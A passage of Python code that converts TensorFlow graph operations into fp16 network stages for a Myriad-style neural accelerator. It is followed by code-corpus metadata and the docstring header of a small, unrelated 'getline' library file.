prev_node.addBias( bias.astype(np.float16) )
prev_node_label = strip_tensor_id(node.outputs[0].name)
prev_node.changeName(prev_node_label)
node_dict[prev_node_label] = prev_node
elif node.type == "MaxPool":
if debug:
print("MaxPool")
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
ksize = node.get_attr("ksize")
stride = node.get_attr("strides")
pad = 0
output_size = [input_shape[0],
apply_padding(node.get_attr("padding"),
int(input_shape[1]),
int(ksize[1]),
stride[1])[0],
apply_padding(node.get_attr("padding"),
int(input_shape[2]),
int(ksize[2]),
stride[2])[0],
outputs[3]]
node.outputs[0].set_shape(output_size)
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, 1, int(input_shape[1]))
prev_node = NetworkStage(
strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.tfsame if node.get_attr("padding") == b'SAME' else PadStyle.tfvalid,
DataType.fp16,
DataType.fp16,
StageType.max_pooling,
ksize[1],
ksize[2],
stride[1],
stride[2],
xyz[0],
xyz[1],
xyz[2],
ksize[1],
ksize[2],
int(output_size[3]),
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == "Relu":
if debug:
print("ReLU")
inputs = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
if(len(inputs) == 4):
node.outputs[0].set_shape(
[inputs[0], inputs[1], inputs[2], outputs[3]])
elif(len(inputs) == 2):
node.outputs[0].set_shape([inputs[0], inputs[1]])
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported ReLU Dimensions")
prev_node.postOp = StageType.relu
prev_node_label = strip_tensor_id(node.outputs[0].name)
prev_node.changeName(prev_node_label)
node_dict[prev_node_label] = prev_node
elif node.type == "Relu6":
if debug:
print("ReLU6")
inputs = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
if(len(inputs) == 4):
node.outputs[0].set_shape(
[inputs[0], inputs[1], inputs[2], outputs[3]])
elif(len(inputs) == 2):
node.outputs[0].set_shape([inputs[0], inputs[1]])
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported ReLU Dimensions")
prev_node.postOp = StageType.relu_x
prev_node.post_param1 = 6.0
prev_node_label = strip_tensor_id(node.outputs[0].name)
prev_node.changeName(prev_node_label)
node_dict[prev_node_label] = prev_node
elif node.type == "LRN":
if debug:
print("LRN")
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
node.outputs[0].set_shape(
[input_shape[0], input_shape[1], input_shape[2], outputs[3]])
top = get_input(strip_tensor_id(inputs.name))
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
bias = np.array([node.get_attr("bias"),
node.get_attr("alpha") * (2 * node.get_attr("depth_radius") + 1),
node.get_attr("beta"),
0], dtype=np.float16)
prev_node = NetworkStage(
strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.LRN,
0,
2 * node.get_attr("depth_radius") + 1,
1,
1,
xyz[0],
xyz[1],
xyz[2],
0,
0,
xyz[2],
None,
None,
bias,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == "MatMul": # Note: Assuming MatMul and FCL are the same.
if debug:
print("FCL / MatMul")
inputs = node.inputs
input_shape = node.inputs[0].get_shape()
taps = node.inputs[1]
taps_shape = node.inputs[1].get_shape()
outputs = node.outputs[0].get_shape()
node.outputs[0].set_shape([node.inputs[0].get_shape()[0],
node.inputs[1].get_shape()[1]])
top = get_input(strip_tensor_id(inputs[0].name))
if len(input_shape) == 2:
xyz = (0, int(input_shape[0]), int(input_shape[1])) #0 is special flag for saying the input is 2D
else:
xyz = (1, 1, int(input_shape[1]))
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.fully_connected_layer,
1,
1,
1,
1,
xyz[0],
xyz[1],
xyz[2],
1,
1,
int(taps_shape[1]),
np.array(taps.eval()).astype(np.float16),
TapsOrder.orderHWCK,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == "Softmax" or node.type == "Sigmoid" or node.type == "Tanh":
if debug:
print(node.type)
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
if(len(input_shape) == 4):
node.outputs[0].set_shape(
[input_shape[0], input_shape[1], input_shape[2], outputs[3]])
elif(len(input_shape) == 2):
node.outputs[0].set_shape([input_shape[0], input_shape[1]])
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported " + node.type + " dimensions")
taps_shape = [1, 1, 1, 1]
stride = [1, 1, 1, 1]
pad = 0
opParams=None
if node.type == "Softmax":
stagetype = StageType.soft_max
opParams = np.array([1], dtype=np.dtype("<i4")) # softmax would be performed on C - axis
elif node.type == "Sigmoid":
stagetype = StageType.sigmoid
else:
stagetype = StageType.tanh
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, int(input_shape[0]), int(input_shape[1]))
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
stagetype,
int(taps_shape[0]),
int(taps_shape[0]),
stride[1],
stride[2],
xyz[0],
xyz[1],
xyz[2],
int(taps_shape[0]),
int(taps_shape[0]),
int(input_shape[1]),
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments,
opParams=opParams)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == "AvgPool":
if debug:
print("Avg Pool")
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
ksize = node.get_attr("ksize")
stride = node.get_attr("strides")
pad = 0
output_size = [input_shape[0],
apply_padding(node.get_attr("padding"),
int(input_shape[1]),
int(ksize[1]),
stride[1])[0],
apply_padding(node.get_attr("padding"),
int(input_shape[2]),
int(ksize[2]),
stride[2])[0],
outputs[3]]
node.outputs[0].set_shape(output_size)
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, 1, int(input_shape[1]))
prev_node = NetworkStage(
strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.tfsame if node.get_attr("padding") == b'SAME' else PadStyle.tfvalid,
DataType.fp16,
DataType.fp16,
StageType.average_pooling,
ksize[1],
ksize[2],
stride[1],
stride[2],
xyz[0],
xyz[1],
xyz[2],
ksize[1],
ksize[2],
int(output_size[3]),
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == "Mean":
if debug:
print("Mean")
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
dimensions = node.inputs[1].eval()
if dimensions[0] != 1 or dimensions[1] != 2:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported Mean operation")
outputs = node.outputs[0].get_shape()
ksize = [0, int(input_shape[1]), int(input_shape[2]), 0]
stride = [1, 1, 1, 1]
output_size = [input_shape[0], 1, 1, outputs[3]]
node.outputs[0].set_shape(output_size)
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, 1, int(input_shape[1]))
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.tfvalid,
DataType.fp16,
DataType.fp16,
StageType.average_pooling,
ksize[1],
ksize[2],
stride[1],
stride[2],
xyz[0],
xyz[1],
xyz[2],
ksize[1],
ksize[2],
int(output_size[3]),
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == "Reshape":
if debug:
print("Reshape")
inputs = node.inputs
input_shape = node.inputs[0].get_shape()
desired_shape = node.inputs[1].eval()
# Check for -1 in desired_shape
if -1 in desired_shape:
if desired_shape[desired_shape == -1].size > 1:
throw(
ErrorTable.StageDetailsNotSupported,
"Illegal Reshape dimension")
# desired_shape = np.reshape(input_shape.as_list(), desired_shape)[0]
input_size = input_shape.num_elements()
desired_size = np.product(desired_shape[desired_shape >= 0])
negative_index = np.argmin(desired_shape)
desired_shape[negative_index] = input_size / desired_size
node.outputs[0].set_shape(desired_shape)
reshape_tracker += [(strip_tensor_id(node.outputs[0].name),
strip_tensor_id(inputs[0].name))]
elif node.type == "Shape":
if debug:
print(node.type, len(node.inputs[0].get_shape()))
elif node.type == "Squeeze":
if debug:
print("Squeeze")
identity_tracker += [(strip_tensor_id(node.outputs[0].name),
strip_tensor_id(node.inputs[0].name))]
elif node.type == "Identity":
if debug:
print("Identity")
inputs = node.inputs
input_shape = node.inputs[0].get_shape()
node.outputs[0].set_shape(node.inputs[0].get_shape())
identity_tracker += [(strip_tensor_id(node.outputs[0].name),
strip_tensor_id(inputs[0].name))]
elif node.type == "NoOp":
if debug:
print("No OP")
pass
elif (node.type == "Concat" or node.type == "ConcatV2") and not node.inputs[0].dtype.is_integer:
explicit = False
#If at least one input is const, do explicit concat
for i in range(0, len(node.inputs)-1):
if get_input(strip_tensor_id(node.inputs[i].name), False) == 0:
explicit = True
break
if explicit or arguments.explicit_concat:
if debug:
print('Explicit concat')
if node.type == 'Concat':
axis_select = node.inputs[0].eval()
input_indices = range(1, len(node.inputs))
else:
axis_select = node.inputs[-1].eval()
input_indices = range(0, len(node.inputs) - 1)
outstride = 0
for idx in input_indices:
outstride += int(node.inputs[idx].get_shape()[axis_select])
outstride *= 2
for idx in input_indices:
inshape = list(node.inputs[idx].get_shape())
while len(inshape) < 4:
inshape.insert(0,1)
in_node = get_input(strip_tensor_id(node.inputs[idx].name), False)
taps = None
if in_node == 0:
#Node not found, we assume it's a constant
taps = np.array(node.inputs[idx].eval())
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name) + '_' + str(idx), [in_node] if in_node!=0 and in_node is not None else None, StorageOrder.orderYXZ,
0, 0, PadStyle.none,
DataType.fp16, DataType.fp16,
StageType.copy, # op_type
1, 1, # op_x, op_y,
1, 1, # sx, sy,
int(inshape[1]), int(inshape[2]), int(inshape[3]), # X, Y, Z
0, 0, int(inshape[3]),
taps, TapsOrder.orderHWCK, None, # taps, taps_order, bias,
None, # Pre Op
StageType.none, # Post Op
None, # Post Op Param 1
0, # Post Op StrideX
0, # Post Op StrideX
myriad_config=myriad_conf, args=arguments)
network.attach(prev_node)
#What follows will work only if axis_select is on the last index
if idx == 0:
outputPointer, outputIndex = prev_node.setoutput(outstride)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
else:
prev_node.setoutput(outstride, outputPointer, outputIndex)
outputPointer = outputPointer + 2 * int(inshape[3])
cnt += 1
continue
if debug:
print("Concat")
concat_channel_size = 0
inputs = node.inputs
for src in inputs:
dim = len(src.get_shape())-1
if dim > 0:
concat_channel_size += int(src.get_shape()[dim])
a_input = node.inputs[1].get_shape()
if len(a_input) == 2:
node.outputs[0].set_shape([a_input[0], concat_channel_size])
else:
node.outputs[0].set_shape([a_input[0], a_input[1], a_input[2], concat_channel_size])
rep_arr = []
if node.type == 'Concat':
for inp in inputs[1:]:
rep_arr.append(strip_tensor_id(inp.name))
else:
for inp in inputs[:-1]:
rep_arr.append(strip_tensor_id(inp.name))
concat_tracker += [(strip_tensor_id(node.outputs[0].name), rep_arr)]
elif ((node.type == 'Add' or node.type == 'Mul' or node.type == 'Maximum') and
get_input(strip_tensor_id(node.inputs[0].name), False) != 0 and
get_input(strip_tensor_id(node.inputs[1].name), False) != 0):
# Elementwise operations of the outputs of two existing nodes
if debug:
print(node.type)
top = [get_input(strip_tensor_id(node.inputs[0].name))[0],
get_input(strip_tensor_id(node.inputs[1].name))[0]]
input_shape = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, int(input_shape[0]), int(input_shape[1]))
if node.type == 'Add':
op = StageType.eltwise_sum
elif node.type == 'Mul' and node.inputs[1].shape[-1] == 1:
op = StageType.scale_with_scalar
elif node.type == 'Mul':
op = StageType.eltwise_prod
else:
op = StageType.eltwise_max
prev_node = NetworkStage(
strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
op,
1,
1,
1,
1,
xyz[0],
xyz[1],
xyz[2],
xyz[0],
xyz[1],
xyz[2],
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif ((node.type == 'Mul' or node.type == 'Div' or node.type == 'RealDiv') and prev_node_label is not None and
(strip_tensor_id(node.inputs[0].name) == prev_node_label or strip_tensor_id(node.inputs[1].name) == prev_node_label)):
# We are probably multiplying with a constant, try
iidx = 1 if strip_tensor_id(node.inputs[1].name) == prev_node_label else 0
# Check if absorption is possible into a convolution, to be possible, we should use
# the convolution output only once, here
if prev_node.op == StageType.convolution and count_inputs(
prev_node_label + ":0") == 1:
if debug:
print('Mul with constant absorbed into convolution')
if node.type == 'Mul':
prev_node.taps = np.multiply(
prev_node.taps, node.inputs[1 - iidx].eval()) # Eval may fail
if prev_node.bias is not None:
prev_node.bias = np.multiply(
prev_node.bias, node.inputs[1 - iidx].eval()) # Eval may fail
else:
prev_node.taps = np.divide(
prev_node.taps, node.inputs[1 - iidx].eval()) # Eval may fail
if prev_node.bias is not None:
prev_node.bias = np.divide(
prev_node.bias, node.inputs[1 - iidx].eval()) # Eval may fail
node_dict[node.name] = node_dict[prev_node_label]
prev_node_label = node.name
prev_node.name = prev_node.unprocessed_name + '/' + strip_tensor_id(node.outputs[0].name)
prev_node.changeName(prev_node.name)
prev_node.alias.append(prev_node.unprocessed_name)
prev_node.alias.append(strip_tensor_id(node.outputs[0].name))
else:
if debug:
print('Mul with constant')
inputs = node.inputs[iidx]
input_shape = node.inputs[iidx].get_shape()
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, 1, int(input_shape[1]))
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.scale,
0,
0,
1,
1,
xyz[0],
xyz[1],
xyz[2],
0,
0,
xyz[2],
node.inputs[1 - iidx].eval(),
TapsOrder.orderHWCK,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif (node.type == 'Add' or node.type == 'Sub') and prev_node_label is not None \
and strip_tensor_id(node.inputs[0].name) == prev_node_label:
# We are probaby adding a constant bias, try
if debug:
print('Add (bias)')
inputs = node.inputs[0].get_shape()
bias_data = None
bias_data = node.inputs[1].eval() # This eval may fail
outputs = node.outputs[0].get_shape()
if(len(inputs) == 4):
node.outputs[0].set_shape(
[inputs[0], inputs[1], inputs[2], outputs[3]])
elif(len(inputs) == 2):
node.outputs[0].set_shape([inputs[0], inputs[1]])
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported Bias Dimensions")
# Add scalar
if bias_data.ndim == 1 and bias_data.shape[0] == 1:
# Populate bias array with data
value = bias_data[0]
bias_data = np.empty([int(outputs[3])])
bias_data.fill(value)
if node.type == 'Add':
prev_node.addBias(np.array(bias_data).astype(np.float16))
else:
prev_node.addBias(np.array(-bias_data).astype(np.float16))
prev_node.changeName(node.name)
prev_node_label = strip_tensor_id(node.outputs[0].name)
prev_node.changeName(prev_node_label)
node_dict[prev_node_label] = prev_node
elif node.type == "Maximum":
if debug:
print(node.type)
if prev_node_label == None:
iidx = 0
else:
iidx = 1 if node.inputs[1].name == prev_node_label + ":0" else 0
inputs = node.inputs[iidx]
input_shape = inputs.get_shape()
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, 1, int(input_shape[1]))
prev_node = NetworkStage(node.name,
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.max_with_const,
0,
0,
1,
1,
xyz[0],
xyz[1],
xyz[2],
0,
0,
xyz[2],
node.inputs[1 - iidx].eval(),
TapsOrder.orderHWCK,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif (node.type == "Square" or node.type == "Rsqrt") and \
(get_input(strip_tensor_id(node.inputs[0].name), False) != 0):
if debug:
print(node.type)
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
outputs = node.outputs[0].get_shape()
if(len(input_shape) == 4):
node.outputs[0].set_shape(
[input_shape[0], input_shape[1], input_shape[2], outputs[3]])
elif(len(input_shape) == 2):
node.outputs[0].set_shape([input_shape[0], input_shape[1]])
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported " + node.type + " dimensions")
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, 1, int(input_shape[1]))
if node.type == "Square":
op_type = StageType.square
else:
op_type = StageType.rsqrt
prev_node = NetworkStage(node.name,
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
op_type,
0,
0,
1,
1,
xyz[0],
xyz[1],
xyz[2],
0,
0,
int(input_shape[1]),
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == "Sum":
if debug:
print(node.type)
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
output_shape = node.outputs[0].get_shape()
axis = node.inputs[1].eval()
if axis != len(output_shape) - 1:
throw_error(
ErrorTable.StageDetailsNotSupported,
"Unsupported " + node.type + " axis")
axis_param = np.array([axis, 0], dtype=np.float16)
top = get_input(strip_tensor_id(inputs.name))
if len(input_shape) == 4:
xyz = (int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]))
else:
xyz = (1, 1, int(input_shape[1]))
prev_node = NetworkStage(node.name,
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.sum_reduce,
0,
0,
1,
1,
xyz[0],
xyz[1],
xyz[2],
0,
0,
1,
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments,
opParams=axis_param)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif (node.type == 'FusedBatchNorm' and prev_node_label is not None and
len(node.inputs) == 5):
if debug:
print('FusedBatchNorm')
# Fold the batchnorm into the weights
if prev_node.op == StageType.convolution or \
prev_node.op == StageType.fully_connected_layer or \
prev_node.op == StageType.depthwise_convolution:
if debug:
print('FusedBatchNorm absorbed into convolution')
eps = node.get_attr('epsilon')
scale_param = node.inputs[1].eval()
offset = node.inputs[2].eval()
mean = node.inputs[3].eval()
var = node.inputs[4].eval()
if len(mean) == 0 or len(var) == 0:
throw_error(
ErrorTable.StageDetailsNotSupported,
"FusedBatchNorm inputs mean and variance are not defined. The graph is not created for inference.")
variance = var + eps
scale = np.reciprocal(np.sqrt(variance)) * scale_param
bias = offset - (mean * scale)
scale = np.reshape(scale, [1, 1, 1, -1])
bias = np.reshape(bias, [1, 1, 1, -1])
if prev_node.op == StageType.depthwise_convolution:
scale = np.swapaxes(scale,2,3)
bias = np.swapaxes(bias,2,3)
prev_node.taps = prev_node.taps * scale
if prev_node.bias is not None:
if bias is not None:
prev_node.bias = prev_node.bias * scale + bias
else:
prev_node.bias = prev_node.bias * scale
else:
if bias is not None:
prev_node.addBias(np.array(bias).astype(np.float16))
node_dict[node.name] = node_dict[prev_node_label]
prev_node_label = node.name
prev_node.name = prev_node.unprocessed_name + '/' + node.name
prev_node.changeName(prev_node.name)
prev_node.alias.append(prev_node.unprocessed_name)
prev_node.alias.append(node.name)
else:
throw_error(
ErrorTable.StageDetailsNotSupported,
"FusedBatchNorm must be preceded by convolution or fully connected layer")
elif node.type == 'Slice' and not node.inputs[0].dtype.is_integer:
if debug:
print('Slice')
input_shape = node.inputs[0].get_shape()
slicingbegin = node.inputs[1].eval()
slicingsize = node.inputs[2].eval()
if (len(input_shape) != 4 or len(slicingbegin) != 4 or len(slicingsize) != 4 or
slicingbegin[0] != 0 or slicingbegin[1] != 0 or slicingbegin[2] != 0 or
input_shape[0] != slicingsize[0] or input_shape[1] != slicingsize[1] or input_shape[2] != slicingsize[2]):
throw_error(
ErrorTable.StageDetailsNotSupported,
"Slice type not supported")
top = get_input(strip_tensor_id(node.inputs[0].name))
curslicing = []
curslicing.append(
(top, int(
slicingbegin[3]), int(
slicingbegin[3] + slicingsize[3])))
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.copy,
1,
1,
1,
1,
int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]),
1,
1,
slicingsize[3],
None,
TapsOrder.orderKCHW,
None,
None,
StageType.none,
None,
0,
0,
curslicing,
myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == 'ExtractImagePatches':
if debug:
print("ExtractImagePatches")
# Currently not supported, will be interpreted as reorg for yolo-v2
throw_error(ErrorTable.StageDetailsNotSupported, node.type)
'''
inputs = node.inputs[0]
input_shape = node.inputs[0].get_shape()
stride = node.get_attr("stride")
output_shape = [input_shape[0], tf.Dimension(int(input_shape[1]) / stride),
tf.Dimension(int(input_shape[2]) / stride),
tf.Dimension(int(input_shape[3]) * stride * stride)]
node.outputs[0].set_shape(output_shape)
top = get_input(strip_tensor_id(inputs.name))
op_node = NetworkStage(
node.name + '_op',
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.reorg,
0,
0,
0,
0,
int(input_shape[1]),
int(input_shape[2]),
int(input_shape[3]),
int(output_shape[1]),
int(output_shape[2]),
int(output_shape[3]),
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments,
opParams=np.array([stride], dtype=np.int32))
network.attach(op_node)
prev_node_label = node.name + '_op'
node_dict[prev_node_label] = prev_node
cnt += 1
prev_node = NetworkStage(
node.name,
[node.name + '_op'],
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.copy,
1,
1,
1,
1,
int(output_shape[1]),
int(output_shape[2]),
int(output_shape[3]),
int(output_shape[1]),
int(output_shape[2]),
int(output_shape[3]),
None,
None,
None,
None,
None,
None,
0,
0,
myriad_config=myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = node.name
node_dict[prev_node_label] = prev_node
cnt += 1
'''
elif (node.type == 'StridedSlice') and not node.inputs[0].dtype.is_integer:
if debug:
print('StridedSlice')
input_shape = node.inputs[0].get_shape()
slicingbegin = node.inputs[1].eval()
slicingsize = node.inputs[2].eval() - slicingbegin
slicingstride = node.inputs[3].eval()
begin_mask = node.get_attr('begin_mask')
end_mask = node.get_attr('end_mask')
ellipsis_mask = node.get_attr('ellipsis_mask')
new_axis_mask = node.get_attr('new_axis_mask')
shrink_axis_mask = node.get_attr('shrink_axis_mask')
if begin_mask != 5 or end_mask != 5 or ellipsis_mask != 0 or new_axis_mask != 0 or shrink_axis_mask != 2:
throw_error(
ErrorTable.StageDetailsNotSupported,
"StridedSlice attributes not supported")
if (len(input_shape) != 3 or len(slicingbegin) != 3 or len(slicingsize) != 3 or len(slicingstride) != 3 or
slicingsize[1] != 1 or slicingstride[0] != 1 or slicingstride[1] != 1 or slicingstride[2] != 1):
throw_error(
ErrorTable.StageDetailsNotSupported,
"Slice type not supported")
top = get_input(strip_tensor_id(node.inputs[0].name))
curslicing = []
curslicing.append(
(top, int(slicingbegin[1]) * int(input_shape[2]), (int(slicingbegin[1])+1) * int(input_shape[2]))
)
prev_node = NetworkStage(strip_tensor_id(node.outputs[0].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.copy,
1,
1,
1,
1,
int(input_shape[0]),
int(input_shape[1]),
int(input_shape[2]),
1,
1,
int(input_shape[2]),
None,
TapsOrder.orderKCHW,
None,
None,
StageType.none,
None,
0,
0,
curslicing,
myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[0].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == 'Split' and node.inputs[0].dtype.is_integer:
if debug:
print('Split')
n = len(node.outputs)
dim = node.inputs[0].eval()
input_shape = node.inputs[1].get_shape()
size = int(input_shape[dim])
dim += 1
while dim < len(input_shape):
size *= int(input_shape[dim])
dim += 1
top = get_input(strip_tensor_id(node.inputs[1].name))
for i in range(n):
curslicing = []
curslicing.append((top[0] if top is not None else None, size//n * i, size//n * (i+1)))
prev_node = NetworkStage(strip_tensor_id(node.outputs[i].name),
top,
StorageOrder.orderYXZ,
0,
0,
PadStyle.none,
DataType.fp16,
DataType.fp16,
StageType.copy,
1,
1,
1,
1,
1,
int(input_shape[0]),
int(input_shape[1]),
1,
1,
size//n,
None,
TapsOrder.orderKCHW,
None,
None,
StageType.none,
None,
0,
0,
curslicing,
myriad_conf,
args=arguments)
network.attach(prev_node)
prev_node_label = strip_tensor_id(node.outputs[i].name)
node_dict[prev_node_label] = prev_node
cnt += 1
elif node.type == 'Pad':
if debug:
print('Pad')
padding_tracker += [(strip_tensor_id(node.outputs[0].name),
strip_tensor_id(node.inputs[0].name),
node.inputs[1].eval())]
elif (node.type == 'TruncatedNormal' or node.type == 'Assign' or
node.type == 'RandomUniform' or node.type == 'Div' or node.type == 'RealDiv' or node.type == 'Mul' or
node.type == 'Floor' or node.type == 'Add' or node.type == 'Sub' or
node.type == 'Rsqrt' or node.type == 'RandomStandardNormal' or
node.type == 'L2Loss' or node.type == 'Pack' or node.type == 'Slice' or
node.type == 'Prod' or node.type == 'ExpandDims' or node.type == 'ConcatV2' or
node.type == 'StridedSlice' or node.type == 'Fill'or node.type == 'StringJoin' or node.type == 'SaveV2' or
node.type == 'RestoreV2' or node.type == 'ShardedFilename' or
node.type == 'MergeV2Checkpoints'):
pass
else:
throw_error(ErrorTable.StageDetailsNotSupported, node.type)
if len(node.outputs) > 0 and strip_tensor_id(node.outputs[0].name) == output_node_name:
if node.type == 'Concat' or node.type == 'ConcatV2':
nodes = network.search_several(get_input(node.name)[0])
NetworkStage.concat(nodes)
break
if len(res.shape) == 4:
network.outputTensor = (
res.shape[0],
res.shape[1],
res.shape[2],
res.shape[3])
else:
network.outputTensor = (res.shape[0], 1, 1, res.shape[1])
if file_gen:
try:
np.save(filename + "_expected.npy", res)
except BaseException:
throw_error(ErrorTable.NoOutputNode, extra=net.blob.keys())
return network
| 80,713 | 0 | 183 |
090b7c98b12efeb6c22312354186eb599698aef2 | 316 | py | Python | getline/excepts.py | timtadh/getline | c17a3405bde1f2edd2bdfbb9ad4c230d0419ac0b | [
"BSD-3-Clause"
] | 4 | 2015-03-25T04:53:43.000Z | 2016-07-17T18:06:42.000Z | getline/excepts.py | timtadh/getline | c17a3405bde1f2edd2bdfbb9ad4c230d0419ac0b | [
"BSD-3-Clause"
] | null | null | null | getline/excepts.py | timtadh/getline | c17a3405bde1f2edd2bdfbb9ad4c230d0419ac0b | [
"BSD-3-Clause"
] | null | null | null | '''
Getline - A library to get text from the console
Author: Tim Henderson
Contact: tim.tadh@hackthology.com
Copyright (c) 2010 All Rights Reserved.
Licensed under a BSD style license see the LICENSE file.
File: excepts
Purpose: Exception types used by getline
'''
| 24.307692 | 56 | 0.787975 | '''
Getline - A library to get text from the console
Author: Tim Henderson
Contact: tim.tadh@hackthology.com
Copyright (c) 2010 All Rights Reserved.
Licensed under a BSD style license see the LICENSE file.
File: excepts
